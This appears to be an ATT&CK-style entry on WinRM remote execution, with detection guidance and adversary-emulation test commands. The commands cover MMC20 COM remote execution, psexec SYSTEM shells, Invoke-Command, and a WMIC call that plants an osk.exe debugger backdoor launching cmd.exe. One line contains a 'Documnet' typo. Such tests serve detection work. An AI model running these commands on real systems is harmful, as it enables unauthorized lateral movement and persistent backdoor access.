Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with thewinrmcommand or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.
Platforms: Windows
Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator
System Requirements: WinRM listener turned on and configured on remote system
Remote Support: Yes
Powershell Enable WinRM
Supported Platforms: Windows
powershell Enable-PSRemoting -Force
Powershell lateral movement using the mmc20 application com object
Reference:
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| computer_name | Name of Computer | string | computer1 |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Utilize WMIC to start remote process
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Utilize psexec to start remote process
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |
psexec \\host -u domain\user -p password -s cmd.exe
Execute Invoke-command on remote host
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| host_name | Remote Windows Host Name | String | Test |
| remote_command | Command to execute on remote Host | String | ipconfig |
invoke-command -computername #{host_name} -scriptblock {#{remote_command}}